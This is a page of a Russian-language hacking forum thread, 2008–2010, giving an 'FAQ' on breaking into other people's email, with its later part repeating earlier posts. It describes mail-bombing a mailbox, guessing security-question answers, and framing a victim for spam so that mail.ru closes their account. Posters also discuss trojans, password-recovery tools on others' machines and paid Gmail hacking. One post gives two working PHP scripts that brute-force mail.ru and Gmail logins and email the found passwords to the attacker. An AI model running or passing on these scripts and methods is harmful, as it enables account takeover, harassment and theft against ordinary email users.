FAQ по взлому почты. - Страница 3

Rossava · 18.05.2008, 14:53

Это все конечно же прекрасно ) Я прочитал всем спасибо за инфу ... но
Вы ничего не говорили про трояны или пинчи. у меня вопрос как раз по этому поводу )
Стоит ли вообще заниматься пинчами или это головная боль ? И сложно ли пинчи хорошо заскриптовать ?

*Deementor* · 19.05.2008, 07:20

Цитата:


	Стоит ли вообще заниматься пинчами или это головная боль ? И сложно ли пинчи хорошо заскриптовать ?

Все относительно, если пинчы так распространены - значит не такая уж и головная боль. Если некоторые теряют паролики - значит можно хорошо закриптовать, нужен только криптор "симпатичный". Для кого то это невыносимая головная боль, а для кого то как два пальца об асфальт.

Vaderz · 06.11.2008, 14:49

Начало начал

Самый распространенный способ общения людей в Инете - это несомненно E-mail (мыло, как называем его мы - хацкеры

). Можно переписываться с кем угодно по всему миру, получать новости, обменивать и скачивать проги. Я бы не стал говорить, что мыло действительно нужно каждому, это даже не Рулезз! (правило жизни) и не ПОИНТ (базовая точка), МЫЛО - эта сама жизнь! Жизнь в Интернете основана на взаимном общении и E-mail в этом - основа! Конечно, есть и другие способы общения (Аська, BBS, Chat, IRC), но это не так круто.
Не понимаю я людей, у которых есть выход в сеть, но нет е-мейла. Последнее время меня просто бесят люди без выхода в сеть и мыла. Блин, ну мы же не в 18-ом веке живем: заводи Ё-маil хоть каждый день! Че-то я отвлекся, эта статья о том как [з]ахватить, [з]авалить, [з]акрыть ящик соседа.
Работать с почтой можно по-разному. Работать в браузере на страничках почтовых служб наиболее глупо и небезопасно (хотя в случае внезапной потери всей инфы на винте это пригодится, т.к. письма хранятся на серваке почтовой службы). Однако чаще пользуются мейлерами - спецовыми прогами, которые скачивают почту с серваков и выдают тебе её на блюдечке. Типичный пример - OutLook Express, который поставляется вместе с Маcтдаем и потому многие его юзают (включая меня!).

Ready? GO!

Let`s go FLOOD

Теперь поговорим о конкретном: атака на мыло - это, в основном, флуд/cпам ящика. Флуд - это когда ты утром проверяешь почту - а там 1000 писем 100 килобабного содержания. Вот и попробуй разобраться с ними. Вообще-то зафлудить мыло проще пареной репы, поэтому этот способ юзают только дауны и ламеры! Вот, к примеру 3 способа:

1. Все, что нужно, это подключиться к 25 порту какого-нибудь почтового сервера (даже не обязательно почтового, а просто того на котором работает старая версия почтового демона, или к компьютеру, предоставляющему почтовый доступ к FTP sit'ам и представившись тем, кому вы желаете подложить свинью заказать пару-сотню файлов на ваше усмотрение

).

2. Воспользоваться анонимным мейл-генератором. Спецовая прога, которая создаёт огромное количество писем и посылает их по адресу с вашего компа. Таких прог существует куча, вот типичные проги: HackTek и ещё лучше Avalanch. Только не забудь включить анонимный прокси

. Хотя, почти с каждой такой прогой прилагается хороший прокси-лист. Если нет - бегом на http://www.void.ru=)).

3. Воспользоваться почтовой службой общественного пользования, типа http://www.mail.ru или http://www.inbox.ru и под анонимным логином отослать штук 20 писем размером по 500кБ. Это самый гиморный способ, да и к тому же письма отсылаются медленно, но гораздо быстрее, чем это было бы с твоего компа. Опять же обязательно врубай анонимный прокси.

4. Подписать атакуемое мыло на какую-нибудь рассылку(или эхо) (типа компьютерные клубы, где обсуждаются разные темы среди большого круга людей. В принципе тут проблем нет, но я не советую этим злоупотре???ть, т.к. это ламерские шутки. Используйте их, если есть повод. Вот типично: вы договорились об обмене данными, а ваш партнёр обманул вас. Вот тут это и пригодится. Флуд - это как ядерное оружие - все об этом знают, но никто им не пользуется, зато в мире порядок и дружба. Теперь ты тоже ядерная страна

.

4. Зафлудить ящик с помощью cgi-скрипта на твоей паге. Подробнее читай статью CuTTer-a ([email protected]) в хз каком номере Х

.

Кто я?

К каждому письму прикрепляется небольшая шапка, которая содержит много интересной информации: IР-шник, название и регистрационный номер проги - мейлера, которым пользуется приславший письмо, почтовая служба, уникальный номер письма, путь прохождения письма до вас, время отправления и прибытия, номер компа в локальной сети и многое другое. Однако, всё это скрыто от читателя, т.е. тебя! Давай посмотрим эту интересную инфу. Если ты всё еще пользуешься Outlook-ом, то открой исследуемоё письмо и жмем Файл, затем Свойства и выбираем закладку Подробности. Теперь всё на виду. В The Bat! делаем так: Открываем письмо, жмём Просмотр и выбираем Служебная информация. Сверху письма прибавляется шапка.

О том, что можно вытянуть из шапки, Я покажу тебе на примере. # - МОИ КОММЕНТАРИИ.
пример

Brute Force

Письма смерти.

Рассматривать захват почты буду на примере халявной почтовой службы. В принципе, таки образом можно захватить таким способом любой ящик в сети. Итак ищем жертву. Допустим, это опять Василиса Пупкевич с мылом [email protected]. Для начала ты должен отправить ему на мыло любое письмо для проверки, в котором попросить, найти любую причину, отправить вам обратно это письмо как можно быстрее. Способ работает только тогда когда владелец регулярно проверяет свою почту, в данном случае почту [email protected]. А если нет, зачем тебе тогда это мыло?

). Вам необходимо написать на английском письмо со спамом, надеюсь этому учить не надо, хотя для тех кто не умеет выражаться вот пример. Вы отправляете ему это письмо в txt файле и просите послать ламера это письмо со спамом вам обратно на почту, только нужно, чтобы ламер скопировал данный спам и послал как обычное письмо, без прикрепленного файла. Дальше пишешь умную мессагу админу мэил.ру [[email protected]] и говоришь в ней, мол, такой то ублюдок занимается спамом, флудом о вообще онанизмом

. И прилагаешь еще данное письмо со спамом. Через несколько часов тебе приходит извещение от админа посмотреть всю инфу о пользователе, пославшем вам это письмо, это делается очень просто: открываешь письмо ламера , посланное тебе со спамом, нажимаешь на кнопочку more details, или вроде того, и копируешь всю инфу об этом письме и владельце данного письма. Шлешь ее админу мэил.ру, он проверяет своими способами, было ли и вправду отправлено данное письмо, а так как ламер вам сам его послал, то оно, естественно, было отправлено вам, и в последствии вам приходит благодарность и ящик пива

от админа мэил.ру, в письме от админа будет говориться то, что данный ящик закрыт благодаря таким людям как ты! Отечество тебя не забудет, перец. Данный способ обмана почтовых служб работает только на бесплатных почтах, на платных настоящего юзера не закроют у него сначала 50 раз спросят было ли все так, как я говорю.

Спасибо за внимание.

Статья взята с форума _http://greatforum.org

Бретон · 25.12.2008, 01:45

а почему MRP находит в QIP только мой собственный пароль а не другие?

kotlowan · 27.02.2009, 06:37

Подскажите, а если забыл пароль mail.ru
винт сломан на котором the bat стоял
то какими методами взлома пользоватся
подскажите путь в котором следует искать
чем пользоватся что бы сломать
потому как через восстановление пароля не
получается там тупой автомат
который не понимает ситуацию
а контрольный вопрос не помню

Виталий_2009 · 23.03.2009, 01:40

ниче не понятно , как можно поделить словарь, это же не яблоко

honor · 09.04.2009, 11:27

[QUOTE=Alennikov;732352]В моём предыдущем сообщении была неточность, странно что никто не обратил внимания ;), "ваш IP забанят", забанить могут и ID компа, и можно только догадываться....

Подскажите как можно узнать ID компа? И как его сменить?

Kabal 01 · 12.06.2009, 16:53

Цитата:

Сообщение от Бретон


	а почему MRP находит в QIP только мой собственный пароль а не другие?

Вопрос хоть и был задан давно, но лучше ответить поздно, чем никогда. Тем более, что такой вопрос задают многие.
Multi Password Recovery показывает только тот пароль который был сохранен в файле config.ini. А это означает, если пользователь использует опцию "сохранить" пароль, то вам повезло. Но если пользователь вводит пароль каждый раз ручками, то про пароль можете забыть. Проверить это достаточно легко. Открываете config.ini с помощью блокнота, если в строке
SavePass= стоит NO, то про пароль можно забыть, если стоит Yes, то вам повезло. Удачи.

Добавлено через 1 час 4 минуты

Цитата:

Сообщение от kotlowan


	Подскажите, а если забыл пароль mail.ru винт сломан на котором the bat стоял то какими методами взлома пользоватся подскажите путь в котором следует искать чем пользоватся что бы сломать потому как через восстановление пароля не получается там тупой автомат который не понимает ситуацию а контрольный вопрос не помню

ну в таких случаях либо через администрацию сервиса, либо брут. Темпаче что ящик твой и хоть что то ты знаешь о пароле : цифровой, буквенный, спец.символы, количество символов ну т.п.

Sarasvati · 14.07.2009, 17:00

Объясните как узнать пароль от почты на mail с помощью этой программы?
Что значит: если есть доступ к компу(+ права админа)
Доступ к компу этого человека?

/Сияющий/

Цитата:


	Что значит: если есть доступ к компу(+ права админа)

Значит: доступ к компьютеру этого человека и права администратора на этом компьютере.

zuzik_mf · 28.01.2010, 22:36

брут 2 месяца ломал и получилось)

*Deementor* · 30.01.2010, 16:17

Лучше вообще не использовать проги на своих машинах, регистрируемся на бесплатном хостинге, главное чтобы он держал file get contents
и ставим скрипт

PHP код:


			
css
***********
<html>

 <head>

  <style>

   body

   { 

    padding:10px; 

    background:#2A2E33; 

    font-family:tahoma, verdana, arial; 

    font-size:11px; 

    text-align:center; 

    color:#B9B9BD; 

   }

   a:link, a:hover, a:visited

   {

    color:#B9B9BD;

    text-decoration: none;

   }

   input

   { 

    vertical-align:middle; 

    margin:1px 0; 

    padding-right:10px; 

    border:1px solid #336600; 

    padding:2px; 

    background:#363940; 

    color:#B9B9BD; 

   }

   form

   { 

    padding:10px;

    border:1px solid #666; 

    width:200px; 

    margin:0 auto; 

   }

  </style>

  <title>Mail.ru Bruteforce</title>

 </head>

 <body>


***************
<?

error_reporting (0);



if(set_time_limit(0))

{

    set_time_limit(0);

    ignore_user_abort(1);

    $limit = true;

}



echo('<a href="?id=1">По списку паролей</a><br><a href="?id=2">Список Email</a><br><br>');



function login($email,$password)

{

    $email = strtolower($email);

    list($login, $domain) = explode('@',$email);

    $openMail = file_get_contents('http://win.mail.ru/cgi-bin/auth?Login='.urlencode($login).'&Password='.urlencode($password).'&Domain='.urlencode($domain));

    if(!preg_match('|<title> Вход в систему </title>|',$openMail) && preg_match('|<title>.+'.str_replace('.','\.',$email).'.+</title>|',$openMail))

    {

        return true;

    }

    else

    {

        return false;

    }

}



$good = 'GOOD.txt'; 

$bad = 'BAD.txt'; 



if($_GET['id'])

{

?>

Good mail "<?=$good?>" <? if(is_writable($good)) echo('<font color=YellowGreen>доступен для записи</font>'); else echo('<font color=Red>не доступен для записи</font>'); ?><br>

Bad mail "<?=$bad?>" <? if(is_writable($bad)) echo('<font color=YellowGreen>доступен для записи</font>'); else echo('<font color=Red>не доступен для записи</font>'); ?><br>

set_time_limit() = <? if($limit) echo('<font color=YellowGreen>On</font> (Время работы скрипта не ограничено)'); else echo('<font color=Red>Off</font> (Время работы скрипта ограничено)'); ?><br><br>

<?

}



$good = fopen($good,'a');

$bad = fopen($bad,'a');



if($_GET['id'] == '1')

{

    if(eregi('^[a-z0-9\._-]+@[a-z0-9\._-]+.[a-z]{2,5}$',$_POST['email']) && $_POST['file'] && $_POST['admin'])

    {

        $file = file_get_contents($_POST['file']);

        $file = str_replace("\r\n","\n",$file);

        $file = explode("\n", $file);

        for($i=0;$i<count($file);$i++)

        {

            $password = $file[$i];

            $send = 'Email: '.$_POST['email'].', password: '.$password;

            if(login($_POST['email'],$password))

            {

                fwrite($good, $send);

                fwrite($good, "\n");

                mail($_POST['admin'],'Brute: '.$_POST['email'],$send,'From: '.$_POST['email']."\r\n");

                echo($send.'<br>');

                break;

            }

            else

            {

                fwrite($bad, $send);

                fwrite($bad, "\n");

            }

        }

    }

    else

    {

        echo('<form method=\'POST\'>

        Email для атаки:<br>

        <input type=\'text\' name=\'email\'><br>

        Email Админа:<br>

        <input type=\'text\' name=\'admin\'><br>

        Список:<br>

        <input type=\'text\' name=\'file\'><br><br>

        <input type=submit>

        </form>');

    }

}

elseif($_GET['id'] == '2')

{

    if($_POST['pass'] && $_POST['file'] && $_POST['admin'])

    {

        $file = file_get_contents($_POST['file']);

        $file = str_replace("\r\n","\n",$file);

        $file = explode("\n", $file);

        for($i=0;$i<count($file);$i++)

        {

            $mails = $file[$i];

            $send = 'Email: '.$mails.', password: '.$_POST['pass'];

            if(login($mails,$_POST['pass']))

            {

                fwrite($good, $send);

                fwrite($good, "\n");

                mail($_POST['admin'],'Brute: '.$mails,$send,'From: '.$mails."\r\n");

                echo($send.'<br>');

                continue;

            }

            else

            {

                fwrite($bad, $send);

                fwrite($bad, "\n");

            }

        }

    }

    else

    {

        echo('<form method=\'POST\'>

        Пароль для брута:<br>

        <input type=\'text\' name=\'pass\'><br>

        Email Админа:<br>

        <input type=\'text\' name=\'admin\'><br>

        Список:<br>

        <input type=\'text\' name=\'file\'><br><br>

        <input type=submit>

        </form>');

    }

}

fclose($good);

fclose($bad);

?>

 </body>

</html>

PHP код:


			
<?php 

////////////////////// 
////Gmail-Brute////// 
///////////////////////




//////////////////////// 
# This script was created to Brute Force G-Mail Logins,# 
#it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) # 
//////////////////////// 

$dic ="your Dictionary file here.txt"; 

/////////////////////// 



echo " 
<title>Gmail Brute Force Attacker</title> 
</head> 
<style type='text/css'> 
body { 


font:Verdana, Arial, Helvetica, sans-serif; 
font-size:12px; 
border-color:#FFFFFF; 
} 
.raster_table { 
background-color:#444444; 
border-color:#CCCCCC; 
} 
.alert { 
    color:#FF0000; 
} 
</style> 
<body> 
<table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'> 
<tr> 
<td> 
<div align='center'><b>Gmail Brute Force Attacker</b></div> 
        </td> 
    </tr> 
</table> 
<table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'> 
    <tr> 
        <td> 
            <div align='center'> 

            </div> 
        </td> 
    </tr> 
    <tr> 
        <td> 
            <div align='center'> 
            &nbsp; 
            </div> 
        </td> 
    </tr> 
    <tr> 
        <td> 
            <div align='center'> 
                <form method='post'> 
                    Username to brute:<br> 
                    <input name='username' type='text' /><br><br> 
                    <input name='attack' type='submit' value='dictionary' /> - <input name='attack' type='submit' value='brute' /><br> 
                </form> 
            </div> 
        </td> 
    </tr> 
    <tr> 
        <td> 
            <div align='center'> 
            &nbsp; 
            </div> 
        </td> 
    </tr> 
</table> 
"; 

// Sets variables and retrives google error for comparing 
if(isset($_POST['attack']) && isset($_POST['username'])) { 
    $username = $_POST['username']; 
    $headers = array( 
    "Host: mail.google.com", 
    "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4", 
    "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", 
    "Accept-Language: en-us,en;q=0.5", 
    "Accept-Encoding: text", # No gzip, it only clutters your code! 
    "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7", 
    "Date: ".date(DATE_RFC822) 
    ); 
    $c = curl_init('https://mail.google.com/mail/feed/atom'); 
    curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication 
    curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers 
    curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output! 
    curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow 
    curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); 
    curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); 
    curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised 
    $wrong = curl_exec($c); // Get it 
    curl_close($c); // Close the curl stream 
} 

//Dictionary Attack 
if($_POST['attack'] == "dictionary") { 
    $Dictionary = file("$dic"); 
    for ($Position = 0; $Position < count($Dictionary); $Position++) { 
        $Dictionary[$Position] = str_replace("\r\n", "", $Dictionary[$Position]); 
        if(check_correct($username, $Dictionary[$Position])) { 
            die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> 
    <tr> 
        <td> 
            <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div> 
        </td> 
    </tr> 
</table> 
</body> 
</html>"); 
        } 
    } 
    echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> 
    <tr> 
        <td> 
            <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the dictionar 
y attack.</b></div> 
        </td> 
    </tr> 
</table>"; 
} 

//Brute Attack 
elseif($_POST['attack'] == "brute") { 
    for ($Pass = 0; $Pass < 2; $Pass++) { 
        if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; } 
        if(check_correct($username, $Pass)) { 
            die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> 
    <tr> 
        <td> 
            <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div> 
        </td> 
    </tr> 
</table> 
</body> 
</html>"); 
        } 
    } 
    echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> 
    <tr> 
        <td> 
            <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the brute for 
ce attack.</b></div> 
        </td> 
    </tr> 
</table>"; 
} 
echo "</body> 
</html>"; 

// Function for checking whether the username and password are correct 
function check_correct($username, $password) 
{ 
        global $wrong, $headers; 
        $c = curl_init('https://'.$username.':'.$password.'@mail.google.com/mail/feed/atom'); 
        curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication 
        curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers 
        curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output! 
        curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow 
        curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); 
        curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); 
        curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised 
        $str = curl_exec($c); // Get it 
        curl_close($c); 
        if($str != $wrong) {return true;} 
        else {return false;} 
} 


?>

CashMashine · 28.03.2010, 14:16

сколько стоит обычно взлом почты?(gmail.com)

*Deementor* · 01.04.2010, 19:41

CashMashine, от 5 wmz

craddal · 03.04.2010, 11:24

Цитата:

Сообщение от Deementor


	CashMashine, от 5 wmz

а ты можешь помочь?
мне нужно взломать почту на рамблере, очень нужно.
кто может помочь пишите..
денег в наличии не много, но и бесплатно я не прошу.

/Сияющий/
сюда

Oxy Gen · 05.04.2010, 16:41

Цитата:

Сообщение от Deementor


	Лучше вообще не использовать проги на своих машинах, регистрируемся на бесплатном хостинге, главное чтобы он держал file get contents и ставим скрипт [php]

Подскажите такой хост. И как его поставить?
Создать файл aaa.php ? и залить его ? и соответственно набарать http:\\host.aaa.php
Так?

18.05.2008, 14:53	#31
Rossava Неактивный пользователь Регистрация: 18.05.2008 Сообщений: 1 Репутация: 0	Ответ: FAQ по взлому почты. Это все конечно же прекрасно ) Я прочитал всем спасибо за инфу ... но Вы ничего не говорили про трояны или пинчи. у меня вопрос как раз по этому поводу ) Стоит ли вообще заниматься пинчами или это головная боль ? И сложно ли пинчи хорошо заскриптовать ?

25.12.2008, 01:45	#34
Бретон Неактивный пользователь Пол: Регистрация: 01.12.2008 Сообщений: 2 Репутация: 1	Re: FAQ по взлому почты. а почему MRP находит в QIP только мой собственный пароль а не другие?

27.02.2009, 06:37	#35
kotlowan Пользователь Пол: Регистрация: 21.06.2007 Сообщений: 126 Репутация: 12	Re: FAQ по взлому почты. Подскажите, а если забыл пароль mail.ru винт сломан на котором the bat стоял то какими методами взлома пользоватся подскажите путь в котором следует искать чем пользоватся что бы сломать потому как через восстановление пароля не получается там тупой автомат который не понимает ситуацию а контрольный вопрос не помню Последний раз редактировалось kotlowan; 27.02.2009 в 07:05..

09.04.2009, 11:27	#37
honor Неактивный пользователь Регистрация: 25.04.2008 Сообщений: 2 Репутация: 0	Re: Учимся ломать мыло при помощи брута [QUOTE=Alennikov;732352]В моём предыдущем сообщении была неточность, странно что никто не обратил внимания ;), "ваш IP забанят", забанить могут и ID компа, и можно только догадываться.... Подскажите как можно узнать ID компа? И как его сменить?

28.01.2010, 22:36	#40
zuzik_mf Неактивный пользователь Регистрация: 28.01.2010 Сообщений: 1 Репутация: 0	Re: FAQ по взлому почты. брут 2 месяца ломал и получилось)

06.11.2008, 14:49	#33
Vaderz Неактивный пользователь Регистрация: 06.11.2008 Сообщений: 3 Репутация: 1	Если вы собрались ломать мыло.ЭТО НУЖНО ЗНАТЬ! Начало начал Самый распространенный способ общения людей в Инете - это несомненно E-mail (мыло, как называем его мы - хацкеры). Можно переписываться с кем угодно по всему миру, получать новости, обменивать и скачивать проги. Я бы не стал говорить, что мыло действительно нужно каждому, это даже не Рулезз! (правило жизни) и не ПОИНТ (базовая точка), МЫЛО - эта сама жизнь! Жизнь в Интернете основана на взаимном общении и E-mail в этом - основа! Конечно, есть и другие способы общения (Аська, BBS, Chat, IRC), но это не так круто. Не понимаю я людей, у которых есть выход в сеть, но нет е-мейла. Последнее время меня просто бесят люди без выхода в сеть и мыла. Блин, ну мы же не в 18-ом веке живем: заводи Ё-маil хоть каждый день! Че-то я отвлекся, эта статья о том как [з]ахватить, [з]авалить, [з]акрыть ящик соседа. Работать с почтой можно по-разному. Работать в браузере на страничках почтовых служб наиболее глупо и небезопасно (хотя в случае внезапной потери всей инфы на винте это пригодится, т.к. письма хранятся на серваке почтовой службы). Однако чаще пользуются мейлерами - спецовыми прогами, которые скачивают почту с серваков и выдают тебе её на блюдечке. Типичный пример - OutLook Express, который поставляется вместе с Маcтдаем и потому многие его юзают (включая меня!). Ready? GO! Как можно узнать пароли к чужому ящику? Существует масса способов. Например, в некоторых почтовых службах предлагают услуги по подсказке пароля к аккаунту, если ты сообщишь им дату создания этого ящика или ответишь на некоторый вопрос (который ты сам задаешь при создании шампуня). Ответы на эти вопросы можно незаметно выудить из самого человека (метод Социального Перегруза или БиоХака) или попытаться подобрать самому. Например самый распространенный вопрос - "Как меня зовут?" или "Девичья фамилия матери". Ну, и вариации на эту тему! Подобная штука есть на http://www.mail.ru, http://www.e-mail.ru и http://www.newmail.ru, etc. Конечно, самый надёжный способ узнать пароль - это офф- или он-лайн шпионство (типа засылка троянов). Здесь, как говорится, результат не заставит себя долго ждать. Let`s go FLOOD Теперь поговорим о конкретном: атака на мыло - это, в основном, флуд/cпам ящика. Флуд - это когда ты утром проверяешь почту - а там 1000 писем 100 килобабного содержания. Вот и попробуй разобраться с ними. Вообще-то зафлудить мыло проще пареной репы, поэтому этот способ юзают только дауны и ламеры! Вот, к примеру 3 способа: 1. Все, что нужно, это подключиться к 25 порту какого-нибудь почтового сервера (даже не обязательно почтового, а просто того на котором работает старая версия почтового демона, или к компьютеру, предоставляющему почтовый доступ к FTP sit'ам и представившись тем, кому вы желаете подложить свинью заказать пару-сотню файлов на ваше усмотрение). 2. Воспользоваться анонимным мейл-генератором. Спецовая прога, которая создаёт огромное количество писем и посылает их по адресу с вашего компа. Таких прог существует куча, вот типичные проги: HackTek и ещё лучше Avalanch. Только не забудь включить анонимный прокси. Хотя, почти с каждой такой прогой прилагается хороший прокси-лист. Если нет - бегом на http://www.void.ru=)). 3. Воспользоваться почтовой службой общественного пользования, типа http://www.mail.ru или http://www.inbox.ru и под анонимным логином отослать штук 20 писем размером по 500кБ. Это самый гиморный способ, да и к тому же письма отсылаются медленно, но гораздо быстрее, чем это было бы с твоего компа. Опять же обязательно врубай анонимный прокси. 4. Подписать атакуемое мыло на какую-нибудь рассылку(или эхо) (типа компьютерные клубы, где обсуждаются разные темы среди большого круга людей. В принципе тут проблем нет, но я не советую этим злоупотре???ть, т.к. это ламерские шутки. Используйте их, если есть повод. Вот типично: вы договорились об обмене данными, а ваш партнёр обманул вас. Вот тут это и пригодится. Флуд - это как ядерное оружие - все об этом знают, но никто им не пользуется, зато в мире порядок и дружба. Теперь ты тоже ядерная страна. 4. Зафлудить ящик с помощью cgi-скрипта на твоей паге. Подробнее читай статью CuTTer-a ([email protected]) в хз каком номере Х. Кто я? К каждому письму прикрепляется небольшая шапка, которая содержит много интересной информации: IР-шник, название и регистрационный номер проги - мейлера, которым пользуется приславший письмо, почтовая служба, уникальный номер письма, путь прохождения письма до вас, время отправления и прибытия, номер компа в локальной сети и многое другое. Однако, всё это скрыто от читателя, т.е. тебя! Давай посмотрим эту интересную инфу. Если ты всё еще пользуешься Outlook-ом, то открой исследуемоё письмо и жмем Файл, затем Свойства и выбираем закладку Подробности. Теперь всё на виду. В The Bat! делаем так: Открываем письмо, жмём Просмотр и выбираем Служебная информация. Сверху письма прибавляется шапка. О том, что можно вытянуть из шапки, Я покажу тебе на примере. # - МОИ КОММЕНТАРИИ. пример Return-Path: [email protected] #Установленный адрес возврата, но он мало что говорит, т.к. его с лёгкостью можно подделать (мы сами ставим его в настройках). Received: from relay1.aha.ru ([195.4.67.135] verified) by aha.ru (CommuniGate Pro SMTP 3.2b4) with ESMTP id 4637825 for [email protected]; Sun, 10 Jun 1899 13:17:51 +0400 #Дата получения послания моим почтовым серваком Received: from elephant.mail.ru (elephant.mail.ru [194.226.198.85]) by relay1.aha.ru (8.9.3/8.9.3/aha-r/0.04B) with ESMTP id XAA00604 for ([email protected]); Sun, 11 Jul 1999 23:16:46+0400 (MSD) #Дальше пошли почтовые серваки с их IPшниками и датами получения\пересылки Received: from camel-int ([10.0.1.1] helo=camel.mail.ru) by elephant.mail.ru with esmtp (Exim2.12 #1) id 113P5h-000NVu-00; Sun, 11 Jul 1999 23:16:45 +0400 Received: (from mail@localhost) by camel.mail.ru (8.9.2/8.9.1) id XAA64053; Sun, 11 Jul 199923:16:45 +0400 (MSD)Date: Sun, 10 Jun 1899 13:17:51 +0400 (MSD) #Вот и дата прибытия письма на мой почтовый сервак. Message-Id: [email protected] #Уникальный номер письма. Если тебя зафлудили или прислали что-нибудь нехорошее, то ты можешь нажаловаться админу почтового сервака, переслав ему эти письма. Подробнее читай ниже. Received: from [212.46.8.60] by win.mail.ru with HTTP; Sun, 10 Jul 1985 19:16:45 +0000 (GMT) #Попался! IP-шник приславшего с датой отправки From: =?KOI8-R?Q?"Ипполит=20Т"?= ([email protected]) #Кодировка отправления и мыло отправителя To: [email protected] #это ты. Cc: [email protected]bject: =?KOI8-R?Q?Re:=20Ксакеп-круто=кул?= Mime-Version: 1.0X-Mailer: The Bat! (v1.33) S/N 9EB473C9 #Посылал The Bat! версия и регистрационный номер как на ладони. X-Originating-IP: [212.46.8.60]?IP'шник товарища,отправившего мне письмо. Content-Type: text/plain; charset=koi8-r #Сообщение выслано прямым простым текстом в кодировке KOI8-R Content-Transfer-Encoding: 8bit? Далее идет никому не нужная муть. Способы послать анонимный е-мэйл мы уже рассмотрели выше на примере, как зафлудить ящик. В этом случае нужно просто послать всего одно сообщение, а не 10000! То, что вас не узнают - это 100%. Только не нарывайтесь на международные службы типа FBI или ФАПСИ, они могут узнать ваш IP у прокси-сервера (вот им он точно расскажет!). Но, я думаю, Вы люди умные и сами сможете определить - на кого стоит нарываться, а с кем лучше дружить (правило хакера: не ссорься со всеми сразу!). Brute Force Можно так же узнать пароли на мыло и прямым Brute Force. Но используя ресурсы только твоего компа - это может занять месяц! Тут нужно действовать по-другому. Возможно организовать Brute Force атаку с вашей паги (page) используя Java-апплет. И каждый посетитель вашей странички (с согласия или без) будет принимать участие в кряке! В этом случае можно сломать пароль и за 2-4 дня! Но подробнее об этом позже. Если у тебя выделенка - уже лучше, но лучше юзать рут шелл(как получить бесплатный шелл читай скоро на [x]). Письма смерти. Рассматривать захват почты буду на примере халявной почтовой службы. В принципе, таки образом можно захватить таким способом любой ящик в сети. Итак ищем жертву. Допустим, это опять Василиса Пупкевич с мылом [email protected]. Для начала ты должен отправить ему на мыло любое письмо для проверки, в котором попросить, найти любую причину, отправить вам обратно это письмо как можно быстрее. Способ работает только тогда когда владелец регулярно проверяет свою почту, в данном случае почту [email protected]. А если нет, зачем тебе тогда это мыло?). Вам необходимо написать на английском письмо со спамом, надеюсь этому учить не надо, хотя для тех кто не умеет выражаться вот пример. Вы отправляете ему это письмо в txt файле и просите послать ламера это письмо со спамом вам обратно на почту, только нужно, чтобы ламер скопировал данный спам и послал как обычное письмо, без прикрепленного файла. Дальше пишешь умную мессагу админу мэил.ру [[email protected]] и говоришь в ней, мол, такой то ублюдок занимается спамом, флудом о вообще онанизмом. И прилагаешь еще данное письмо со спамом. Через несколько часов тебе приходит извещение от админа посмотреть всю инфу о пользователе, пославшем вам это письмо, это делается очень просто: открываешь письмо ламера , посланное тебе со спамом, нажимаешь на кнопочку more details, или вроде того, и копируешь всю инфу об этом письме и владельце данного письма. Шлешь ее админу мэил.ру, он проверяет своими способами, было ли и вправду отправлено данное письмо, а так как ламер вам сам его послал, то оно, естественно, было отправлено вам, и в последствии вам приходит благодарность и ящик пива от админа мэил.ру, в письме от админа будет говориться то, что данный ящик закрыт благодаря таким людям как ты! Отечество тебя не забудет, перец. Данный способ обмана почтовых служб работает только на бесплатных почтах, на платных настоящего юзера не закроют у него сначала 50 раз спросят было ли все так, как я говорю. Спасибо за внимание. Статья взята с форума _http://greatforum.org Последний раз редактировалось Сияющий; 06.11.2008 в 16:06.. Причина: убрал рекламу и + теги CUT

23.03.2009, 01:40	#36
Виталий_2009 Неактивный пользователь Регистрация: 22.03.2009 Сообщений: 1 Репутация: 0	Re: FAQ по взлому почты. ниче не понятно , как можно поделить словарь, это же не яблоко

30.01.2010, 16:17	#41
